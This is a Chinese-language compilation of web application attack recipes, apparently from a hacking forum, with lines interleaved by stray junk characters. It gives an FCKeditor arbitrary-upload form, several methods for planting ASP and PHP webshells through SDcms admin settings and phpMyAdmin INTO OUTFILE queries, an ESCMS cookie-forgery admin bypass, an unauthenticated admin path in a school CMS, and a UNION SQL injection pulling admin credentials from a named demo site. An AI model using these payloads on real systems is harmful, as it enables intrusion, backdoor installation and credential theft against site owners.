跳转到网站根目录上传任意文件。
7 n+ V& T P( _. r如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件
, _+ ]( A2 n# F& J3 y: K<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">5 U$ g; }' b" f
Upload a new file:<br>3 [2 D6 {/ G7 N7 {% b
<input type="file" name="NewFile" size="50"><br>1 u- n5 Y) p; t
<input id="btnUpload" type="submit" value="Upload">, L3 \ U. Y `
</form>
9 O) ]- r3 T% x, I2 a# e$ T0 c, Z-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
/ |# Z @9 |0 D1 A# m+ u4 S1 F7 f4 H' u
SDcms 后台拿webshell
3 l5 Q& E( C# l4 Q3 f& l$ b1 [- }. c5 s/ } \
第一种方法:
5 M2 g6 n# O% a2 r进入后台-->系统管理-->系统设置-->系统设置->网站名称;
" Q2 ~$ a# @) [/ s3 b把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx
! a! ~+ h9 A1 I( |( C用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。
( Q q; w# }; o4 n2 d第二种方法:" r& e% K1 x7 w( g& Z
进入后台-->系统管理-->系统设置-->系统设置->上传设置;
* s3 G9 E/ J# Z" B6 [* N* }在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!
; L2 b: h2 V i1 f* k第三种方法:4 I2 s, n! F/ \8 u" T6 u9 M6 R. p" M1 `
进入后台-->界面管理-->模板文件管理-->创建文件2 k5 f& E3 V+ Q& }7 t) ]. U1 D9 {
文件名写入getshell.ashx
2 }1 |( g- ~! x6 P% k9 N# y内容写入下面内容:$ x. ^3 P- j# W; z& s1 X& ]
/====================复制下面的=========================/6 q4 T( G/ b, Y# T/ g5 `$ p% I* S
<%@ WebHandler Language="C#" Class="Handler" %>
* V! Q/ G. z7 w2 B% G. |9 Ausing System;
" W8 t7 n6 x6 X7 Wusing System.Web;2 K0 S9 p0 U8 v, v
using System.IO;. Z V9 ?: m; w x. j
public class Handler : IHttpHandler {+ Q6 f' i; ~' c; I! R
public void ProcessRequest (HttpContext context) {
% m2 w6 l. T2 X8 U" A5 ~0 X$ Fcontext.Response.ContentType = "text/plain";5 v1 L: K7 |' R* a
StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));$ F' k6 m( `5 |6 D) P
file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
. ~& i! Q7 o5 gfile1.Flush();
3 W3 f1 m: w, w! }file1.Close();
$ T8 c9 l" X) m: B0 k}8 k& s$ q7 z q0 k! H! F/ D
public bool IsReusable {1 t, ]3 R, t8 X# ^4 \8 @5 Y5 B/ \( @( o
get {
( f# y% J8 _# t. e: w. P( R5 G+ {$ Yreturn false;
' \4 |$ U3 Y- W- w4 n0 ^}
4 w) ?+ h* n" P- |& b}1 R/ b3 u: g. b& c$ B) P3 B3 P
}
u' Y. X, V3 K7 S5 E, z/=============================================/
, s( j" G/ a) e- N; f访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx
: Z% b+ A. K5 i( l& y) ^+ K6 ? d$ i会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接
. v: D: D2 t+ E: m-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
: \0 v0 Y% S* O ?
) }( k3 b R" B, S |: n% V8 C0 LESCMS网站管理系统0day% a: _9 T+ `6 C: }% }% {- e
0 L) u2 o3 z/ S后台登陆验证是通过admin/check.asp实现的
0 Q0 ?( C. \8 }, A) v; S
. r3 U' N P; ~5 T2 }/ |首先我们打开http://target.com/admin/es_index.html
1 Q* I0 Z3 S" R. F2 h7 ~然后在COOKIE结尾加上1 T9 X$ W; y5 v( I4 x0 ]2 Y5 [, H
; ESCMS$_SP2=ES_admin=st0p;3 O% V$ t, L* k1 d, w
修改,然后刷新
7 W, ^7 q* M' B3 S1 X1 w进后台了嘎..$ Q6 Y+ Y6 R( f3 I( k
然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
) U' Y6 I) {2 p9 s% e; G) M& j" L4 Y% q- w! c1 X
利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
0 J% @+ {. ]8 R5 M1 C! |5 v5 n! p嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp
& m% h6 o7 d$ n$ V& w3 T存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..2 ^- W1 Z1 s0 u) R+ s C8 Y: a3 b
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了0 W4 Q4 J9 I9 V) K# p$ k
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------6 W7 g/ P7 B. s" n4 J% P
1 J, E+ P7 L+ R2 v5 M0 t宁志网站管理系统后台无验证漏洞及修复# ^* g3 I& d; S4 o
- @+ m. V7 j E, M
网上搜了一下,好像没有发布.如有雷同纯粹巧合!
2 T" N( D% L2 M$ w, z: F$ G官方网站:www.ningzhi.net* [' a9 M& W* F# Z4 _, O% d- G
学校网站管理系统 V.2011版本 9 Y1 }; J# ?* I+ I4 E- P
http://down.chinaz.com/soft/29943.htm , G6 H! I( f: |2 ~5 G. F r% H @
其它版本(如:政府版等),自行下载.
* a$ F5 x9 t# I5 o; _& K0 {漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~: i& U5 O! u) `6 J% h8 H2 {
login.asp代码如下:: w; m+ \2 _* ]% T- J8 |% A
<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %>
& d9 h V4 w' Smanage.asp代码我就不帖出来了.反正也没验证.$ w; P" I5 [" @* B8 ^
只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!3 z! U7 F- N6 K U1 X Y
漏洞利用:
, a | B9 z. s) R% i/ Y5 J直接访问http://www.0855.tv/admin/manage.asp/ W1 f2 x- n. C/ v, Q" f" U
数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web57 q4 R% D3 P3 ~/ u) f1 ~- q$ U2 I
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1 @; R {; T( W3 Y; c% b; @
% H9 c6 z$ k2 t9 G6 |0 Nphpmyadmin拿shell的四种方法总结及修复
3 b: w y" M, C# O( F
$ @- f) ]+ L+ a; K+ X0 A方法一:" m+ i; p1 I7 y
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );/ b+ q/ h& k {& h& h' Z1 j
INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
: z6 ]8 k1 H0 H: RSELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';7 s1 {0 i7 R7 D; q& `8 Q
----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
7 N" E, M. L) k4 K) z. N2 _ 一句话连接密码:7on& w) X% U4 N1 W& I
方法二:
# E N; d1 g; U$ z/ A% ]3 r读取文件内容: select load_file('E:/xamp/www/s.php');
$ N4 Q, Z$ k0 F/ e" B写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'& z$ l. K7 E% k4 ^, [
cmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'; n7 t+ I( T4 b& l7 z8 t3 `# u
方法三:, c0 R( O- x/ c- X( U- ?# O& b
JhackJ版本 PHPmyadmin拿shell: |! Y$ |# K- {+ K1 ^
Create TABLE study (cmd text NOT NULL);
6 o) k6 V9 `4 z$ YInsert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
+ C g: p* {" K' x/ b4 Lselect cmd from study into outfile 'E:/wamp/www/7.php';
! W$ I2 E1 d# U, N: S( D hDrop TABLE IF EXISTS study;
1 f6 G7 Q! V! ?<?php eval($_POST[cmd])?>0 |4 M/ y# x" I/ N- V) c
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。( t) c; c& ]. A+ K
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1* v, @, k( S* v$ Y3 T7 j
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1
3 F7 S0 n* I+ M0 ]DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。& R* }$ ]0 F- V+ A& K% x
方法四:
! Y( B& b3 M5 l& ?7 gselect load_file('E:/xamp/www/study.php');$ W/ F4 c( F' A4 U' x7 f. d* j
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'" A4 A% p5 l) h+ h$ j. u4 R
然后访问网站目录:http://www.2cto.com/study.php?cmd=dir
( w4 T/ T6 q7 N6 h----------------------------------------------------------------------------------------------------------------------------------------------------------------------- V) V2 z' F5 q3 L
5 y$ H* s2 D9 \% T' K hNO.001中学网站管理系统 Build 110628 注入漏洞' A4 W+ b! O7 G" Q D7 F
- C0 _( G. }# n8 ?NO.001中学网站管理系统功能模块:
) A# R. m; Z# Y6 q1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等
- F2 n* @& B S& p9 u1 I: v/ Q7 l8 Y2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息! @/ `% X+ Y, O: g% A
3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息
5 N& \4 c" r' r) w4.视频图片管理:一级分类,动态添加视频或者图片等信息
L! i6 M# t# ?: q' s- W5.留言管理:对留言,修改,删除、回复等管理
& u+ _0 u7 P: l6.校友频道:包括校友资料excel导出、管理等功能! r: u% F" \ S+ }$ Z
7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页
/ E g3 x4 J5 n1 K默认后台:admin/login.asp
6 s* d, j8 g) n' a0 ]官方演示:http://demo.001cms.net, Y% m% A; O3 e( L4 O, S
源码下载地址:http://down.chinaz.com/soft/30187.htm
I, r4 ^8 q. O ?: `4 s JEXP:6 ^% A6 K# [, k3 W* f0 w1 L
union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin5 {! n6 L+ I2 b. d% y! e% b
测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
. f$ I+ ~' }" K) k* jgetshell:后台有备份,你懂的: ^' r- p" B, H1 N# {" o1 l
另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
. u/ U l$ y# A: W0 D4 C------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |